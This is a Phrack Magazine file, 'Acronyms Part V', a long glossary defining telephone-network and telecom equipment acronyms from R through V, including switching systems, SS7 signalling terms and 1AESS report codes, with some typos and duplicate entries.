RMM          Remote maintenance module
RMP          Recent change punctuation table
RMPK         Remote shelf
RMR          Remote message registers
RMS          Remote mean square
RMS          Root-mean-square
RMS-D        Remote measurment system-digital
RMS-D1       Remote measurment system-digital signal level one
RMS-D1A      Remote measurment system-digital signal level one access
RMS-M        Remote measurment system-metallic (through SMAS)
RMS-MS       Remote measurment system-metallic small (through SMAS)
RMV          Remove
RMV          Removed from service - 1AESS remove
RN           Reference noise
RN           Ring node
RNA          Release telephone numbers for assignment
RNG          Ringing
RNGS         Rings
RNMC         Remote network management center
RNO          Rss subentity number
RNOC         Regional network operations center
RNR          Receive not ready (LAP-D command/response)
RO           Receive only
RO           Routine other.
ROB          Remote order buffer
ROC          Regional operating company
RODD         Redundant ODD
ROE          Reservation order establishment
ROE          Rss's office equipment
ROH          Receiver off hook
ROI          Reservation order inquiry
ROK          Republic of korea
ROM          Read-only memory
ROOT         System manager for some unix os and COSMOS
ROP          Receive-only printer
ROSE         Remote operation service element (TCAP subset)
ROTF         Operational trouble.
ROTL         Remote office test line
ROTLS        Remote office testline system
ROUT         Routes
ROW          Reservation order withdrawal
RP           Repeater
RPFC         Read power feed current value (IOM2 monitor command)
RPM          Recent change parameters
RPO          Regional procurement organization
RPOA         Recognized private operating agency
RPT          Repeated
RPT          Report
RQ           Rpntr
RQS          Rate/quote system
RQSM         Regional quality service management
RQST         Request
RR           Receive ready (LAP-D command/response)
RRCLK        Remote clock circuit pack
RRO          Reports receiving office
RS           Radiated susceptibiltiy (EMS)
RS           Record separator (ascii control)
RS           Repair service
RS           Reset
RSA          Repair service attendant
RSAT         Reliability and system architecture testing
RSB          Repair service bureau
RSB          Repair servicenbureauem
RSC          Remote switching center
RSC          Reset confirm (SS7: in SCCP and ISUP)
RSC          Residence service center
RSCS         Remote source control system
RSE          Remote service equipment
RSHF         Remote concentration line shelf
RSIT         Remote site
RSLC         Remote subscriber line module controller
RSLE         Remote subscriber line equipment
RSLM         Remote subscriber line module
RSM          Remote switching module
RSS          Remote switching system
RST          Reset received (outgoing)
RST          Resistance test
RST          Resistance test (SARTS command)
RST          Restore
RST          Restored to service status - 1AESS restore
RSTS/E       Resource system time sharing/enhanced
RSU          Remote switching unit
RSY          Resynchronizing (C/I channel code)
RSYD         Rsy downstream
RSYU         Rsy upstream
RT           Radio landline INTER/TRA blocal 1-26
RT           Remote terminal
RT           Remote terminal (opposite to cot)
RT04         Status of monitors - ringing and tone plant-1AESS
RTA          Remote trunk arrangement
RTA          Remote trunking arrangement
RTAC         Regonal Technical Assitance Center
RTAC         Remote a trunk assembler center
RTB          Retransmission buffer
RTCA         Radio technical commission of aeronautics
RTEST        Tops remote test
RTF          Release timeout failure
RTH          Report transaction to count spare and diped line equipment
RTI          Route index
RTIME        Release time (update database time)
RTL          Resistor-transistor logic
RTM          Regional telecommunications management
RTM          Remote test module
RTN          Return to normal (in EOC)
RTOC         Resident telephone order center
RTP          Rate treatment package
RTP          Remote test point (RTS-5A)
RTPP         Remote test port panel
RTR          Route TReatment (GTE)
RTRV         Retrieve
RTS          Relay and telephone number status report
RTS          Remote test unit
RTS          Remote testing system
RTS          Request to send
RTS          SMAS remote test system located in central offices
RTSE         Reliable transfer service element
RTSI         Receive time slot interchanger
RTU          Remote trunking unit
RTU          Right to use
RTZ          Rate zone
RU           Receive unit
RUM          Remote user multiplex
RUP          Request unsolicited processing
RV           Review
RVDT         Review date and time
RVPT         Revertive pulsing transceiver
RVPT         Revertive pulsing transceivers
RW           Read/write permission
RWC          Remote work center
RX           Remote exchange
RZ           Resistance zone
RZ           Return to zero
RxSD         Receive serial data


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 25 of 27

                               {Acronyms Part V}

S            Date and time report received.
S            Seconds
S            Send toscreener
S            Sleeve
S            Start dial signal
S&E          Service & equipment
S-           Supervisory (S-frames)
S-N          Signal-to-noise ratio
S/R          Send/receive key
S1DN         Stage one distribution network
S96          SLC 96
SA           Sattelite trunk INTER/TRA blocal 1-26
SA01         Call store memory audit results - 1AESS software
SAA          System applications architecture (for ps/2)
SABME        Set asynchronous balanced mode (ABM) extended (LAP-D command)
SAC          Service access connector (-> sipb)
SAC          Service area computer
SAC          Special area code
SAC          Switch activation
SAD          System access delay
SAG          Street address guide
SAI          S activity indicator (in EOC)
SAI          Serving area interface
SAI          Summary of action items
SALI         Standalone automatic location identification
SAM          Subsequent address msg. (SS7: in ISUP)
SAMA         Step by step automatic message accounting
SAMEM        Stand-alone billing memory
SANE         Signaling area/network code (SS7)
SAP          Service access point
SAPI         Service access point identifier
SAR          Store address register
SARTS        Switch access tremote test system
SARTS        Switched access remote test system
SAS          Switched access service
SASWF        Save all seems well failure flip flop
SAT          Special access termination
SAT          Supervisory audio tone
SAT          System access terminal
SAW          Surface acoustic wafe (filter)
SB           Switched access-standard-service code for LATA access
SBC          S bus interface circuit
SBCX         SBC extended
SBI          Synchronous backplane interconnect
SBLN         Standby line
SBMS         Southwestern bell mobile service
SBS          Skyline business systems
SBUC         S bus connector
SC           Scanner controller
SC           Sectional center
SC           System controller
SC/SD        Scan and signal distributor
SCA          Service order completion-automatic
SCANS        Software change administration and notification system
SCAT         Stromberg-carlson assistance team
SCC          Specialized common carrier
SCC          Station cluster controller
SCC          Switching control center
SCC          Switching control center.
SCCP         Signaling ccp (SS7: q.71x)
SCCP         Signaling connection control part
SCCS         Specialized common carrier service
SCCS         Switching control center system
SCF          Selective call forwarding
SCF          Simple completion for mdf
SCH          Test scheduale (command)
SCHED        Scheduled
SCI          Spare cable pair inquiry
SCL          Station clock
SCLK         Slave clock
SCM          Scramble coder multiplexer
SCM          Standard completion by mdf
SCM          Subscriber carrier module
SCM          Subscriber carrier module (DMS-1 digital pair gain system NTI)
SCO          Serving central office
SCOT         Stepper central office tester
SCOTS        Surveillance & control of transmissions system
SCP          Service control point
SCP          Service order completion by LAC
SCP          Signal control point
SCP          Signal conversion point
SCP          System control program
SCPC         Signal channel per carrier
SCPD         Supplementary central pulse distributor
SCR          Selective call rejection
SCR          Signaling configuration register
SCR          Standard completion by rcmac
SCRC         Send corrected reference equivalent
SCRN         Screening translations
SCS          SCM-10S Shelf (SLC-96)
SCS          SCM-10S shelf (SLC-96)
SCSDH        Scanner and signal distributor handler
SCU          Selector control unit
SCX          Specialized communications exchange
SD           Slip detected
SD           Switched access-improved-service code for LATA access
SD&D         Specific development & design
SDACS        Serving digital accessed and cross-connect system
SDC          Sales development center
SDD          Site dependent data
SDDF         Subscriber digital distributing frame
SDE          Submission/delivery entity (x.400)
SDIS         Switched digital integrated service
SDL          Specification and description language
SDLC         Synchronous DLC
SDLC         Synchronous data link control
SDLH         Synchronous data link handler
SDM          Space division multiplex
SDN          Software defined network
SDN          Software-defined network
SDNBAS       Call failed due to the query's being blocked at the switch
SDNBN        Call failed due to the query's being blocked in the CCS network
SDNGTCAP     Garbled TCAP message received
SDNNCANI     CAMA call failed due to CAMA trunk's not providing ANI for
               query
SDNNCFA      Call failed while the transaction with the NCP was active
SDNNCFI      Call failed while the transaction with the NCP was inactive
SDNNOCANI    CAMA call failed due to CAMA trunk's not providing ANI
               through ONI for query
SDNRER       Call failed because to the conversation with the NCP
               resulted in a return error
SDNRER       Call failed because to the conversation with the NCP
               resulting in a return error
SDNRR        Call failed because to the conversation with the NCP
               resulted in a reject respon
SDNRR        Call failed because to the conversation with the NCP
               resulting in a reject respo
SDNTIM       Call failed due to the query's not being answered in
               time by the NCP
SDNTRF       Call failed due to the NCP's answering with a terminate request
SDOC         Selective dynamic overload controls
SDP          Service delivery point
SDP          Submission and delivery protocol (x.411)
SDPT         Signal distribution points
SDR          Store data register
SDR          Switch data report
SDS          Switched data service
SDS          Synchronous data set
SDSC         Synchronous data set controller
SDT          Software development tools
SE           Special access wats-access-std-service code for LATA access
SE           Special service equipment number
SEAS         Signaling engineering and administration system
SEAS         Signalling engineering and administration systems
SEC          Second
SEC          Signal level behind the echo canceller (C/I channel code)
SEE          Systems equipment engineering
SEG          Segment
SEL          Digital selector (in TMS)
SEL          Selecting lines for an exchange class of service study
SER#         Seral number
SES          Service evaluation system
SES          Unk    (administrative system)
SET          Statistics on equipment and telephone numbers
SET          Strategy execution table
SF           Service field
SF           Signal format
SF           Single frequency.
SF           Special access- WATS access line improved-service code for LATA
SF           Status field (SS7)
SFB          Set next febe to zero
SFD          Superframe detected (C/I channel code)
SFG          Simulated facilities
SFG          Simulated facilities group
SFG          Simulated facility group
SFG          Simulated facility group (SFG) measures.
SFMC         Satellite facility management center
SFN          Simulated facility number
SFV          Signal format verification
SFV          Signaling format verification (SARTS command)
SG           Control/remote metering signal grade INTER/TRA blocal 1-26
SG           Supergroup
SG           Switch group (SG) (also known as half-grid)
SGC          Switching group control
SGD          Failure to receive station group designator (SGD)
SGH          Select graphic rendition (teletex)
SGH          Supply relays for groups of 5xb hunts
SGL          Single
SGML         Standard generic markup language
SGMP         Simple gateway management protocol
SGN          Common language segment number
SHI          Select horizontal spacing (teletex)
SI           Sequenced information
SI           Service indicator
SI           Shift in (ascii control)
SI           Status indicator
SI           Synchronous interface
SIC          Silicon integrated circuit
SICOFI       Signal processing codec filter
SICOFI2      2 channel sicofi
SID          System identification
SIDB         Session information data base
SIDES        Siemens ISDN software development and evaluation system
SIF          Signaling information field (SS7)
SIG          Signaling
SIG          Signaling equipment (in a trunk)
SIGI         Sigi
SIGS         Signaling strobe
SILC         Selective incoming load control
SILC         Selective incoming load controls messages.
SIM          System integrity monitor
SIN          Status indication normal alignment
SIO          Service information octet (SS7)
SIP          Serial interface port
SIPB         Siemens ISDN pc user board
SIPB 5XXX    SIPB modules
SIPB 7XXX    SIPB configurations
SIPMOS       Siemens PMOS
SIPO 6XXX    Siemens ISDN pc software object code
SIPS 6XXX    Siemens ISDN pc software source code
SIR          Sorting inquiry by range
SIS          Special identifying telephone number supplement
SIT          Special identifying telephone number
SIT          Special information tones
SITAC        Siemens isolated thyristor AC
SITE         Site assignments
SITEST       Siemens ISDN protocol software test tools
SIU          Subscriber line interface unit
SJ           Limited switched access line-service code for LATA access
SK           Skip
SK           Skip option
SL           Secretarial line INTER/TRA blocal 1-26
SL           Subscriber line
SLA          Subscriber line adress
SLB          Subscriber line busy
SLC          Signaling link code (SS7)
SLC          Subicer loop carrier
SLC          Subscriber line counts for custom calling features
SLC          Subscriber loop carrier
SLD          Subscriber line data (bus)
SLE          Screen list editing
SLE          Screening line editor
SLEN         SLC line equipment number
SLIC         Subscriber line interface circuit
SLIM         Subscriber line interface module
SLIM         Subscriber loop interface module
SLK          Signaling link
SLM          Subscriber line module
SLMA         SLM analog
SLMD         SLM digital
SLPK         SLC-96 pack
SLRF         Systemiletterntenance results feature (eadas)
SLS          Signaling link selection (SS7)
SLSN         Unk  COSMOS
SLU          Special studies
SM           Same
SM           Sampling INTER/TRA blocal 1-26
SM           Service module
SM           Speech memory
SM           Switch module
SM           Switching modual
SM           Switching module
SM           Synchronous multiplexor
SMAC         Service and maintance administration center
SMAS         Switched maintance access system
SMAS         Switched maintance access system (provides access to the
              RMS-M and RTS)
SMASF        SMAS frame
SMASPU       SMAS power unit
SMD          Surface mounted device
SMDF         Subscriber main distributing frame
SMDI         Subscriber message desk interface
SMDR         Station message detail record
SMDR         Station message detail recording
SMDR         Station message detailed recording
SMDS         Switched multi-megabit data service
SMF          Sub multi frame
SMG          Supermastergroup
SMM          SARTS maintence manager (VAX 1/780)
SMP          SARTS maintance position (TP 52a)
SMPU         Switch Module Processor Unit
SMS          Service management system
SMS          Station management systems
SMS          Switching Module System
SMSA         Standard metropolitan statistical area
SMTP         Simple mail transfer protocol
SMU          Subscriber module urban
SMU          System master unit
SN           Sequence number
SN           Special access termination INTER/TRA blocal 1-26
SNA          System network architecture (IBM)
SNA          Systems network architecture
SNADS        System network architecture distribution service
SNET         Southern new england telephone
SNF          Serial number format
SNL          Signaling link  (CCS7)
SNLS         Signaling link set (CCS7)
SNRS         Signaling network route set (CCS7)
SNS          Service network system
SO           Service order
SO           Shift out
SOAC         Service order analysis and control
SOB          Service observing assignments
SOB          Service observing tag
SOC          Service order cancel
SOC          Service oversight center
SOCC         Standard optical cable code
SOCC         Switching operation control center
SODC         Service order delayed completion
SOE          Service order establishment
SOE          Standrard operating environment
SOF          Service order fix
SOH          Service order history
SOH          Service order withheld
SOH          Start of header
SOI          Service order assignment inquiry
SOI          Service order image
SOL          Service order listing
SOM          Modify a pending service order
SONAR        Service order negotiation and retrieval
SONDS        Small office network data system
SONET        Synchronous optical network
SORD         Service order dispach
SOW          Service order withdrawal
SP           Signal p
SP           Signal point (switching office in SS7)
SP           Signal processing
SP           Signal processor
SP           Signaling point
SP           Stimulus protocol
SPA          Special access
SPACE        Service provisioning and creation environment
SPAN         Space physics analysis network
SPAN         System performance analyzer
SPARED       Line involved in ISLU sparing configuration.
SPC          Signaling poiny code (SS7)
SPC          Southern pacific communications
SPC          Stored program control
SPC          Stored program controlled
SPCR         Serial port control register
SPCS         Stored program control system
SPCS         Stored programacontrolnsystem
SPCS COER    Stored-program control system/central office equipment
              report
SPCSS        Stored program control switching system
SPD          Speed
SPDA         Supplier data program
SPFC         Special purpose function code
SPH          Session protocol handler
SPI          Serial peripheral interface
SPINT        Signal processor interrupt
SPL          Split
SPM          Split and monitor
SPM          Split and monitor (SARTS command)
SPOC         Single point of contact
SPS          Split and supervise
SPS          Split and supervise (SARTS command)
SPUC/DL      Serial peripheral unit controller/data link
SQ           Equipment only-customer premises INTER/TRA blocal 1-26
SQA          Simulated facility group (SFG) announcement (SAQ)
SQD          Signal quality detector
SQL/DS       Structured query language/data system
SRA          Selective routing arrangement
SRAM         Static ram
SRCF         Single line remote call forward
SRDC         Subrate data cross connect
SRDM         Subrate data multiplexer
SRI          Subscriber Remote Interface (RLCM)
SRI          Subscriber Remote Interface pack
SRL          Singing return loss
SRV          Service
SRVT         SCCP Routing Verification Test
SS           Dataphone select-a-station INTER/TRA blocal 1-26
SS           Signaling system
SS           Special services
SS7          Signaling system #7 (ccitt)
SSA          Special service automation
SSAS         Station signaling and announcement subsystem
SSB          Single-sideband
SSB          Switched services bureau
SSBAM        Single-sideband amplitude modulation
SSC          Specal service center
SSC          Special service center
SSC          Special services center
SSC          Standard speech circuit     psb4500/-1
SSCP         Subsystem services control point
SSD          No second start dial wink
SSD          No second start dial wink (MDII)
SSDAC        Specal services dispach administration centers
SSF          Sub service field
SSI          Serial signal interface
SSN          Subsystem number
SSN          Switched service network
SSO          Satellite switching office
SSO          Satellite switching office assignments
SSP          Send single pulses (C/I channel code for test mode)
SSP          Service switching point
SSP          Service switching points
SSP          Signal switching point
SSP          Sponsor selective pricing
SSP          Switching service points
SSP          System status panel
SSPC         Ssp controller
SSPRU        Ssp relay unit
SSTR         Selective service trunk reservation (SSTR).
SSTR         Service selective trunk reservation
SSTTSS       Space-space-time-time-space-space network
SSWAP        Switching services work allocation precedures (GTE)
ST           A signal that indicates the end of mf pulses (stop)
ST           Present status of telephone number
ST           Self test request nt (IOM2 monitor message)
ST           Start
ST           Subscriber terminal
STA          Station sset
STAB         Station abbreviation file
STARS        Sampled traffic analysis and repo ts systems
STATMUX      Statistical multiplexer
STB          Standby
STC          Service test center
STC          Serving test center
STC          Switching technical center
STCR         Syncron transfer control register
STD          Standard
STD          Subscriber trunk dialing
STDM         Statistical time division multiplexing
STEP         Services testing evolution platfoem
STEP         Sides static test of IOS and mf on board (in sitest)
STKE         Stack protect error
STLWS        Supplementary trunk and line work station
STM          Synchronous transfer mode
STN          Station definition
STN          Summarize telephone numbers
STOR         Memory storage
STORY        Screening tool for report files (IOS)
STP          Self test pass (IOM2 monitor message)
STP          Signal transfer point
STP          Signal transfer point (SS7)
STP          Stop
STRAT        Strategy
STS          Shared tenant service
STS          Space-time-space network
STS          Space-time-space switch (TMS-TSI-TMS)
STS          Station signaling
STS          Station signaling test (SARTS command)
STS          Steered tenant service
STS          Synchronous transport signal
STS 2060     Sicofi software
STT          Telephone number status
STTP         Supplementalstrunkntest panel
STTP         Supplementary trunk test panel - trunk testing position (1ess)
STU 2000     Stand alone ISDN user board
STU 2040     Stand alone MTS user board
STU 2050     Stand alone PBC user board
STU 2060     Stand alone SICOF user board
STUDIALO     PC software for STU 2xxx
STX          Start of test
STX          Start of text
SU           Signaling unit
SU           Syndes units (syncronizers-dessyncronizers)
SU5IN        Subunit 5 interrupt
SU6IN        Subunit 6 interrupt
SU7IN        Subunit 7 interrupt
SUB          Sub switch
SUB          Sub-addressing (i.251)
SUB          Substitute character (teletex)
SUBL         Sublet service
SUERM        Su error rate monitor
SUFX         Sufix
SUM1         Summary screen
SUP          Supervision
SUS          Suspend (SS7: in ISUP)
SUSP         Suspend (i.451)
SV           Slave
SV           Switched voice
SVB          Serving bureau
SVC          Critical service circuits
SVC          Switched virtual circuit
SVC          Switched virtual circuits
SVL          Service observing loops
SVP          Surge voltage protector  various
SVS          Select vertical spacing (teletex)
SVS          Switched voice service
SW           Switch name
SW           Switched
SWB          Southwestern bell
SWC          Same wire center
SWC          Set work code
SWEQF        Switch equipment failure.
SWFC         Sliding-window flow control
SWFN         Switch function file
SWG          Sub working group
SWS          Switch work station
SWS          Switched signaling
SWS          Switching signal test (SARTS command)
SWST         Switch signature table
SX           Simplex (mode is a PT TR connected togeather)
SX           Simplex signaling
SXS          Step by (X) step
SYC          System control
SYN          Synchronous idle
SYNDES       Synchonizer/dessynchonizer
SYP          Synchronisation pulse
SYS          Machine number
SYS          System
SYS          System manager
SYSGEN       System generation
SZD          Seized
SxS          Step-by-step or strowger switch
T            Double wire pair
T            Intials of person receiving report.
T            Terminaltion
T            Tip
T&A          Toll and assistance
T&L          Termination
T&M          Talk-and-monitor
T&R          Tip and ring
T&R          Two wire phone connection
T-           Transportfunction-
T-BERD       T-carrier Bit Error Rate Tester
T-GRND       Tip-ground
T1/OS        T1 carrier outstate
T1FE         T1 carrier front end
TA           Tandem tie-trunk INTER/TRA blocal 1-26
TA           Terminal adaption
TA           Terminal adaptor
TA           Transfer allowed
TA           Transfer assembly
TAB          Telephone ability battery
TAC          Technical assistance center
TAC          Tei assignment control (IOS)
TAC          Terminal access circuit
TAC          Test and access circuit
TACD         Telephone area code directory
TAD          Test access digroup
TAG          Translation administration group
TAI          Tie pair assignment inquiry
TAN          Technation access network
TAN          Test access network
TAP          Telephone assistance plan
TAP          Teletex access protocol (x.430: p5)
TAP          Test access path
TAP          Touchtone assignment priority number
TARE         Tariff table (AMA NTI)
TAS          Telephone answering service
TASC         Technical assistance service center
TASC         Telecommunications alarm and surveillance control
TASC         Telecommunications alarm surveillance and control system
TASI         Time assignment speech interpolartion
TASI         Time assignment speech interpolation system
TAT          Test access trunk
TAT          Test alignment of frame terminal
TAT          Transatlantic telephone
TATS         Trouble analysis of transmission and signaling
TAU          Time assignment unit
TBL          Trouble
TC           Control/remote metering-telegraph grade INTER/TRA blocal 1-26
TC           Timing counter
TC           To cable
TC           Toll center
TC           Transaction capabilities
TC15         Reports overall traffic condition - 1AESS traffic condition
TCA          Telephone company administration
TCAP         Telecommunications alarm surveillance
TCAP         Transaction (ie sdngtcap)
TCAP         Transaction capabilities application part
TCAP         Transaction capabilities applications port
TCAS         T-carrier administration system
TCAS         T-carrier administration system)
TCAS         T-carrier administrative system
TCC          Toll control center
TCC          Trunk class code
TCG          Test call generation
TCIF         Telecommunications industry forum
TCM          Time compression multiplexer
TCM          Trellis coded modulation
TCP          Transport control protocol (DOD)
TCR          Transient call record
TCS          Terminating code screening
TCSP         Tandem cross section program
TCU          Timing control unit
TD           Test direction
TD           Tone decoders
TDAS         Traffic data administration system
TDAS         Translation data assemblern system
TDC          Tape data controller
TDC          Telex destination code (ISO 7498)
TDC          Terrestrial data circuit
TDD          Telecommunications device for deaf
TDF          Trunk distributing frame
TDM          Time division multiplex
TDMA         Tdm access
TDRS         Traffic datatrecorderasystem
TE           Terminal equipment
TE           Transit exchange (contains PSF)
TE           Transverse electric
TED          Text editor
TEHO         Tail end hop off
TEI          Terminal endpoint identifier
TELEX        Teleprinter exchange
TELNET       Virtual terminal protocol
TELSAM       Telephone service attitude measurement
TEN          Trunk equipment number
TER          Terminal
TERM         Terminate
TERM         Terminating
TEST         In test mode.
TET          Display or change band filter file
TF           Telephoto/facsimile INTER/TRA blocal 1-26
TFC          Transfer frame changes
TFLAP        T-carrier fault-locating application program
TFS          Trunk forecasting system
TFTP         Television facility test position
TG           Tip-to-ground
TG           Translation guide
TGC          Manual trunk group controls messages.
TGC          Terminal group controller
TGID         Trunk group id
TGMEAS       Basic trunk group measurements
TGN          Trunk group number
TH           Trouble history
THGP         Thousands groups
THL          Trans hybrid loss
TI           Test indication
TIA          Telephone information access
TIC          Telecom ic (IOM-bus)
TICOM        Treated interface common circuit.
TIDE         Traffic information distributor & editor
TIG          Dial transfer input generator
TIM          Timing
TIMEREL      Time release
TINTF        The T interface is down.
TIP          The installation practices
TIRKS        Trunk integrated record keeping system
TK           Local PBX trunk INTER/TRA blocal 1-26
TK           Trunk cable and pair number
TKT          Trouble ticket file
TL           Non-tandem tie trunk INTER/TRA blocal 1-26
TL           Test line
TL02         Reason test position test was denied - 1AESS traffic
TLC          Tail COSMOS
TLC          Translate lanavar/CPS
TLI          Telephone line identifier
TLK          Talk
TLM          Trouble locating manual
TLN          Trunk line network
TLP          Transmission level point
TLPU         Telecommunications line processor unit
TLS          Tail switch
TLTP         Trunk line and test panel
TLTP         Trunk line testrpanelng frame
TLWS         Trunk and line work station
TM           Testmode
TM           Transverse magnetic
TM           Trasfer modus
TM           Trunk mantance
TM1          Terminal 1 (IOS)
TMA          Trunk module analog
TMAS         Transport maintance and administration systems
TMC          Timeslot management channel
TMD          Trunk module digital
TMDF         Trunk main distributing frame
TME          Trunk module equipment
TMMS         Telephone message management system
TMPS         Trunk maintenanceaposition
TMR          Transient memory record
TMRS         Traffic MeasuRment (GTE)
TMRS         Traffic measurement and recording system
TMRS         Traffic metering remote system
TMS          Time mutiplexed switch
TMS          Time-multiplexed switch
TMS          Time-multiplexed switching
TMT          Traffic management.
TMX          Trunk module with x-interface
TN           Telephone number
TN           Tone (C/I channel code: wake up signal)
TN           Transaction number
TN01         Trunk diagnostic found trouble - 1AESS trunk network
TN02         Dial tone delay alarm failure - 1AESS trunk network
TN04         Trunk diag request from test panel - 1AESS trunk network
TN05         Trunk test procedural report or denials - 1AESS trunk network
TN06         Trunk state change - 1AESS trunk network
TN07         Response to a trunk type and status request - 1AESS trunk network
TN08         Failed incoming or outgoing call - 1AESS trunk network
TN09         Network relay failures - 1AESS trunk network
TN10         Response to trk-list input usually a request from test position
TN11         Hourly status of trunk undergoing tests - 1AESS trunk network
TN16         Daily summary of precut trunk groups - 1AESS trunk network
TNC          Terminal node controller
TNDS         Total network data system
TNF          Telephone number format
TNN          Trunk network number
TNOP         Total network operation plan
TNOP         Total network operations plan
TNPC         Traffic network planning center
TNS          Telephone number swap
TO           Toll office
TOC          Television operating center
TOC          Transfer order completion
TOC0         Reports status of less serious overload conditions -
               1AESS traffic
TOC0         Serious traffic condition - 1AESS traffic overload
TOE          Transfer order establishment
TOF          Mass oe transfer order frame listings
TOI          Dial transfer order inquiry
TOL          Transfer order lists
TOO          Transfer order omissions
TOP          Task-oriented practices
TOP          Technical office protocol
TOPQ         Top of queue (Quasi SDL)
TOPS         Timesharing operating system
TOPS         Traffic operator position system
TOS          Trunk orderf-service (list)
TOSS/MP      Traffic operator sequence simulator/mult purpose
TOW          Transfer order withdrawal
TP           Dacs test port or test position
TP           Test position
TP           Tie pair
TP           Toll point
TP 52A       SARTS test position 52A
TPC          TOPS (DMS) position controllers
TPH          Transport protocol handler
TPMP         Tnds performance measurement plan
TPMP         Total network data system performance measurement plan
TPR          Taper code
TPU          Tie pair usage report
TQ           Television grade customized-service code for LATA access
TQ           Trunk query
TQA          Trunk group queuing announcements
TR           Test register
TR           Toll regions
TR           Transfer register
TR           Trunk reservation controls messages.
TR           Turret or automatic call distributor (ACD) trunk INTER/TRA blocal
TR01         Translation information - 1AESS
TRAC         Call tracing
TRANS        Transmit
TRB          Periodic trouble status reporting
TRBL         Unspecified trouble.
TRBLORG      Origination trouble.
TRC          Transfer order recent change report
TRCC         T-carrier restoration and control centers
TRCO         Trouble reporting control office
TRE          Transmission equipment
TREAT        Trouble report evaluation analysis tool
TREAT        Trouble reporteandsanalysisstool
TREQF        Transmission equipment failure.
TRFC15       Fifteen minute traffic report
TRG          Trouble reference guide
TRI          Tone ringer          psb652x
TRI          Transmission equipment assignment inquiry
TRK          Analog or digital recorded announcement trunks
TRK          Trunks
TRKBD        Trunk board.
TRKCT        Trunk circuit.
TRM          Two mile optically remote switching module
TRM          Two-mile remote switching module
TRMG         Terminal group
TRMSN        Transmission
TRMTR        Tramsmitter
TRMTR        Transmitter
TRNS         Translations
TRR          Tip-ring reversal
TRR          Tip-ring reversal (MDII)
TRR          Tip-ring reverse
TRU          Transmit/receive unit
TRVR         Translation verification
TRW          Total reservation order withdrawal
TS           Test number
TS           Time slot
TSA          Time slot assignment
TSC          Test system controller
TSC          Tristate control
TSC/RTU      Test systems controller/remote test unit
TSCPF        Time switch and call processor frame
TSCPF        Time switch and central processor frame
TSG          Timing signal generator
TSI          Time slot interchanger
TSI          Time slot interchangers
TSI          Time-slot interchange
TSIIN        Time-slot interchange interrupt
TSIU         Time slot interchange Unit
TSL          Line equipment summary report
TSMS         Traffic seperation measurment system
TSN          Test session number
TSN          Traffic statistics on telephone numbers
TSO          Time sharing option
TSORT        Transmission system optimum relief tool
TSP          Test supervisor
TSP          Traffic service position
TSPS         Traffic service position system
TSS          Trunk servicing system
TSS          Trunk servicing systems
TSST         Time-space-space-time network
TST          Test
TST          Time-space-time network
TST          Time-space-time switch (TSI-TMS-TSI)
TST          Transmission test
TST          Traveling-wave tube
TSTS         Time-space-time-space network
TSV          Test ststus verification (monitor)
TSW          Total service order withdrawal
TT           Teletypewriter channel INTER/TRA blocal 1-26
TT           Trunk type
TTA          Terminating traffic area
TTAA         Transmission theory and applacations
TTC          Terminating toll center
TTE          Trunk trafic engineering
TTFCOM       Test transmission facility common
TTFCOM       Transmission test facility common
TTL          Transistor-transistor logic
TTMI         Trunkytransmission maintenance index
TTP          Trunk test panel
TTR          Operator trunk trouble reports
TTR          Operator trunk trouble reports (MDII)
TTS          Trunk time switch
TTSI         Transmit time slot interchanger
TTTN         Tandem tie trunk network
TTU          Trasnslation Table Update (GTE)
TTY          Get tty name  - COSMOS command
TTY          Teletypewriter
TTYC         Tty controller
TU           Transmit unit
TU           Trunk unit
TU           Turret or automatic call distributor (acd) line INTER/TRA blocal
TUCHBD       Trunk unit channel board
TUP          Telephone user part (SS7: q.72x)
TUR          Traffic usage recording
TUR          Trunk utilization report
TUT          Trunk under test
TV           TV channel one way 15khz audio-service code for LATA access
TW           TV channel one way 5khz audio-service code for LATA access
TW           Twist
TW02         Dump of octal contents of memory - 1AESS translation
TWX          Teletype writer exchange
TWX          Teletypewriter exchange
TX           Dedicated facility INTER/TRA blocal 1-26
TX           Tone transceivers
TXC          Text checker
TXM          Transfer centrex management
TYP          Switch type
TYP          Type
Talkoff      Take off
Trunk        Trunk
TxSD         Transmit serial data
U            Single wire pair
U(k0)        (ger) u0 echo cancellation interface
U(p0)        (ger) u0 burst mode interface
U-           Unnumbered (u-frames)
U-DSL        U-interface digital subscriber line
UA           Unnumbered ack (LAP-D response)
UA           User agent (x.400)
UAE          User application entity  or  user agent entity (x.400)
UAF          Unblocking acknowledgment failure
UAI          U activation indication (C/I channel code)
UBA          Unblocking acknowledgement
UBL          Unblocling (SS7: in ISUP)
UCA          Unauthorized centralized automatic message accountin (MDII)
UCD          Uniform call distribution
UCL          Unconditional
UCONF        Universal conference
UCS          User control string
UDC          Universal digital channel
UDLC         Universal dlc
UDP          Update dip parameters
UDP          User datagram protocol
UDR          User data rate
UDT          Unidata (SS7: in SCCP)
UDTS         Unidata servive (SS7: in SCCP)
UDVM         Universal data voice multiplexer
UES          Update the entity summary table
UFD          Microfarad
UFO          Unprinted frame orders
UFT          Unitized facility terminals
UI           Unnumbered information  (LAP-D command)
UIC          U-interface unit
UIC          User identification code
UID          User id
UINTF        The ANSI standard U interface is down.
UITP         Universal information transport plan
ULCU         User level control/command unit
UMC          Unassigned multiplexer code
UNDRN        Underrange
UNISTAR      Universal single call telecommunications answering & repair
UNKN         Unknown
UOA          U interface only activation (in EOC)
UP           User part
UPC          Update ccs vs. class of service table
UPDT         Update
UPS          Uninterruptable power systems
UQL          Unequipped label received (outgoing)
US           USOC
US           Unit separator
USART        Universal synchrounous/asynchrounous receiver/transmitter
USB          Upper side band
USITA        United states independent telephone association
USL          List USOC (us) file data
USO          Univeral service order
USO          Universal service order
USOC         Universal service order code
USP          Universal sampling plan
USR          User-to-user information (SS7: in ISUP)
UTC          Unable to comply ack (in eoc)
UTC          Unacknowledged (unnumbered) information transfer control (IOS)
UTC          Update table for concentrator redesign
UTD          Universal tone decoder
UTG          Universal tone generator
UTM          Universal transaction monitor
UTS          Umbilical time slot
UUCICO       Unix to unix copy incoming copy outgoing
UUCP         Unix to unix copy program
UUCP         Unix-system to unix-system copy
UUID         Universal user identification
UUS          User-to-user signaling (i.257 a)
UUT          User to user signaling
UVC          Universal voice channel
UWAL         Universal wats (wide area telephone service) access line
UXS          Unexpected stop
UXS          Unexpected stop (MDII)
V            Volts
V(R)         Receive sequence counter
V(S)         Transmit sequence counter
VAC          Vacuumschmelze (produces cores and transformers)
VAL          Minimum valid hours for entity data
VAN          Value added network
VANS         Value added network service
VAP          Value added process
VAP          Videotext access point
VAR          Value added retailer
VC           Virtual call
VC           Virtual circuit
VCA          Vacant code
